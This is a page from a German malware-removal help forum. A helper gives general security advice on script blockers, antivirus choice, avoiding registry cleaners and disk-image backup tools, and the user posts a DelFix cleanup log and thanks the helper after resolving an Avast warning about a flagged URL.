NoScript verhindert das Ausführen von aktiven Inhalten (Java, JavaScript, Flash,...) für sämtliche Websites. Man kann aber nach dem Prinzip einer Whitelist festlegen, auf welchen Seiten Scripts erlaubt werden sollen. NoScript kann gerade bei technisch nicht allzu versierten Nutzern beim Surfen zum Nervfaktor werden; ob das Tool geeignet ist, muss jeder selbst mal ausprobieren und dann für sich entscheiden. Alternativen zu NoScript (wenn um das das Verhindern von Usertracking und Werbung auf Webseiten) geht wären da Ghostery oder uBlock. Ghostery ist eine sehr bekannte Erweiterung, die aber auch in Kritik geraten ist, vgl. dazu bitte diesen Thread => Ghostery schleift Werbung durch

Malwarebytes Anti Exploit: Schützt die Anwendungen des Computers vor der Ausnutzung bekannter Schwachstellen.




Virenscanner + Firewall
Vorab sei erwähnt, dass man niemals die Schutzwirkung eines Virenscanners überbewerten darf!

Die Dinger sind mittlerweile auch unter Windows stark umstritten und können Probleme bereiten, die man so ohne AV einfach nicht haben wird. Zudem werden sie auch niemals jeden Schädling finden können. Aussagen der Anbieter dieser Software entpuppen sich regelmäßig als Marketinggeblubber. Lies dazu => Aus aktuellem Anlass: Antivirus-Schlangenöl | Elias Schwerdtfeger und => http://www.golem.de/news/antivirenso...12-125148.html

Verwende also MAXIMAL ein einziges der folgenden AVs mit Echtzeitscanner und stets aktueller Signaturendatenbank; verwende immer nur reine Virenscanner (keine Produkte mit Suite oder Internet Security in Namen, denn diese bringen kontraproduktive Firewalls mit - die Windows-Firewall ist alles was benötigt wird!)



Microsoft Security Essentials (MSE) ist ab Windows 8 fest eingebaut, wenn du also Windows 8, 8.1 oder 10 und dich für MSE entschieden hast, brauchst du nicht extra MSE zu installieren. Bei Windows 7 muss es aber manuell installiert oder über die Windows Updates als optionales Update bezogen werden. Selbstverständlich ist ein legales/aktiviertes Windows Voraussetzung dafür.

Zusätzlich kannst Du Deinen PC regelmäßig mit Malwarebytes Anti-Malware und/oder mit dem ESET Online Scanner scannen.



Grundsätzliches
Ändere regelmäßig Deine wichtigen Online-Passwörter und erstelle regelmäßig Backups deiner wichtigen Dateien oder des Systems (genaueres unten im Lesestoff zu Backups)

Finger weg von Registry-Cleanern, Optimizern usw!!! - die Performancesteigerung ist umstritten bis ganz klar nicht belegbar, dafür hast du ein großes Risiko dein System zu zerstören v.a. bei Registry-Operationen. Das Beste ist, die windowseigene Datenträgerbereinigung zu verwenden - und die Registry in Ruhe zu lassen!

Lade Software immer von einem sauberen Portal wie . Finger weg von chip.de oder softonic!
Wähle beim Installieren von Software immer die benutzerdefinierte Option und entferne den Haken bei allen optional angebotenen Toolbars oder sonstigen, fürs Programm, irrelevanten Ergänzungen.
Um Adware wieder los zu werden, empfiehlt sich zunächst die Deinstallation sowie die anschließende Resteentfernung mit Adwcleaner.



Lesestoff:
Backup-/Image-Tools

IMHO sind Wiederherstellungspunkte nix weiter als eine Notlösung, wer sich auf was Funktionierendes verlassen will und muss, kommt um echte Backup/Imaging Software nicht herum. Ich nehme unter Windows immer Drive Snapshot - Disk Image Backup for Windows NT/2000/XP/2003/X64

Damit man sinnvolle Backups hat muss man regelmäßig zB wöchentlich ein Image auf eine separate externe Festplatte erstellen. Diese externe Festplatte wird nur dann angeschlossen, wenn man das Backup erstellen will (oder etwas wiederherstellen muss), sonsten bleibt sie aus Sicherheitsgründen sicher im Schrank verwahrt - allein schon aus dem Grund, die Backups vor Krypto-Trojaner zu schützen.



Option 1: Drivesnapshot
Drive Snapshot - Disk Image Backup for Windows NT/2000/XP/2003/X64
Download (32-Bit) => http://www.drivesnapshot.de/download/snapshot.exe
Download (64-Bit) => http://www.drivesnapshot.de/download/snapshot64.exe


Screenshots:
http://www.drivesnapshot.de/images/startup.png
http://www.drivesnapshot.de/images/save3.png



Es gibt da auch leicht abgespeckte Versionen von Acronis TrueImage gratis wenn man Platten von Seagate und/oder Western Digital hat. Vllt sagen diese Programme dir mehr zu. Mein Favorit aber ist das kleine o.g. Drivesnapshot.



Option 2: Seagate DiscWizard
Download => Seagate DiscWizard - Download - Filepony


Screenshots:
http://filepony.de/screenshot/seagate_discwizard5.jpg
http://filepony.de/screenshot/seagate_discwizard4.png
http://filepony.de/screenshot/seagate_discwizard3.jpg




Option 3: Acronis TrueImage WD Edition
Download => Acronis True Image WD Edition - Download - Filepony


Screenshots:
http://filepony.de/screenshot/acroni...d_edition1.jpg
http://filepony.de/screenshot/acroni...d_edition2.jpg

__________________
Logfiles bitte immer in CODE-Tags posten

Alt 08.05.2017, 10:29   #39
Perlsau
 
Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Standard

Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat



Jetzt bin ich mal so richtig erleichtert nach langer Zeit

Code:
ATTFilter
# DelFix v1.013 - Datei am 08/05/2017 um 11:10:43 erstellt
# Aktualisiert am 17/04/2016 von Xplode
# Benutzer : Hamlet - WIN7PC
# Betriebssystem : Windows 7 Ultimate Service Pack 1 (64 bits)

~ Aktiviere die Benutzerkontensteuerung ... OK

~ Entferne die Bereinigungsprogramme ...

Gelöscht : C:\FRST
Gelöscht : C:\AdwCleaner
Gelöscht : C:\Users\Hamlet\Desktop\Addition.txt
Gelöscht : C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe
Gelöscht : C:\Users\Hamlet\Desktop\Fixlog.txt
Gelöscht : C:\Users\Hamlet\Desktop\FRST.txt
Gelöscht : C:\Users\Hamlet\Desktop\FRST64.exe
Gelöscht : C:\Users\Hamlet\Desktop\log.txt
Gelöscht : C:\Users\Hamlet\Desktop\SecurityCheck.exe

~ Erstelle ein Backup der Registrierungsdatenbank ... OK

~ Lösche die Wiederherstellungspunkte ...

Gelöscht : RP #432 [Geplanter Prüfpunkt | 05/08/2017 05:38:59]

Ein neuer Wiederherstellungspunkt wurde erstellt !

~ Stelle die Systemeinstellungen wieder her ... OK

########## - EOF - ##########
         

Habe mir gerade Drive Snapshot angesehen. Die fälligen 39 Euro kann ich wohl noch aufbringen.

Jetzt bleibt nur noch die Frage nach dem zu installierenden Echtzeit-Schutz.

Habe mir jetzt Malwarebytes Antiexploid und Emisoft Antimalware installiert. Geld für ein neues Windows hab ich zur Zeit nicht, aber diese beiden Tools kann ich wohl bezahlen, gilt ja glaub ich für ein Jahr. Geld für ein USB-Laufwerk hab ich auch gerade keines, aber womöglich am Ende des Monats, wenn einer meiner Schuldner seine monatliche Rate begleicht.

Und wie bereits erwähnt: Ich habe via Paypal bereits was gespendet, das ist es mir wert.

Danke für deine Mühe, deine Geduld und Ausdauer und auch für dein Verständnis.

Geändert von Perlsau (08.05.2017 um 10:50 Uhr)

Antwort

Themen zu Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat
ahnung, anderes, avast, beiträge, benutzerkonten, blockiert, datei, down, erhalte, folge, frage, konto, liste, logdateien, malwarebytes, rechner, suche, systemsteuerung, test.dat, unbekannt, virus, virusmeldung, webseite, webseiten, wächter, zeiten, zugang




Ähnliche Themen: Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat


  1. Chrome öffnet bei externen Links automatisch 2 Tabs mit http://--use-spdy%3Doff/ und http://--disable-http2/
    Plagegeister aller Art und deren Bekämpfung - 22.03.2017 (27)
  2. Bei Yahoo taucht Bedrohungsmeldung von targo12.com auf
    Plagegeister aller Art und deren Bekämpfung - 10.06.2016 (1)
  3. Bei Yahoo taucht Bedrohungsmeldung von targo12.com auf
    Plagegeister aller Art und deren Bekämpfung - 05.06.2016 (15)
  4. Avast Pop-up bei Schoener-Fernsehen | Infektion URL:Mal | http://sda.vidcore.tv/crossdomain.xml
    Log-Analyse und Auswertung - 07.12.2015 (7)
  5. Ist ein Download von "http://au.v4.download.windowsupdate.com..." sicher? Avast meldet eine Bedrohung
    Plagegeister aller Art und deren Bekämpfung - 12.09.2015 (1)
  6. http://img.virus-analytics.com/js/adr... ständig Warnung von Avast sobald ich eine Seite lade. Werde anscheinend umgeleitet
    Log-Analyse und Auswertung - 30.01.2015 (21)
  7. avast blockiert http://utils.cdneurope.com/ WIN7
    Plagegeister aller Art und deren Bekämpfung - 15.07.2014 (7)
  8. Infiziertes Objekt gefunden
    Log-Analyse und Auswertung - 13.04.2014 (25)
  9. Neuer AV-Programme Test von av-test.org
    Antiviren-, Firewall- und andere Schutzprogramme - 13.02.2014 (21)
  10. Infektion mit http://www.qvo6.com und http://static.icmapp.com
    Log-Analyse und Auswertung - 04.12.2013 (7)
  11. verstecktes Objekt gefunden
    Antiviren-, Firewall- und andere Schutzprogramme - 29.08.2013 (2)
  12. flsx.sys (AVG) Verstecktes Objekt
    Log-Analyse und Auswertung - 30.05.2013 (11)
  13. Avast blockiert URL:Mal auf nahezu jeder Website [http://i.trkjmp.com/crossdomain.xml]
    Plagegeister aller Art und deren Bekämpfung - 18.09.2012 (1)
  14. avast - bösartige website, Objekt: "newporto.cn/cgi-bin/options.cgi?"
    Plagegeister aller Art und deren Bekämpfung - 01.10.2010 (1)
  15. Backdoor.bot - Objekt: WinRAR\Zip.SFX
    Log-Analyse und Auswertung - 18.09.2010 (9)
  16. Objekt ist gesperrt
    Plagegeister aller Art und deren Bekämpfung - 26.04.2008 (1)

Zum Thema Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat - Kann man hier irgendwie einstellen, daß Antworten nicht automatisch an die letzte Antwort angehängt werden und somit kein neuer Post entsteht? Eset hat sich nach der Beendigung selbst deinstalliert. Es - Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat...
Archiv
Du betrachtest: Avast Bedrohungsmeldung - Objekt: http://047.088.216.068:8888/test.dat auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.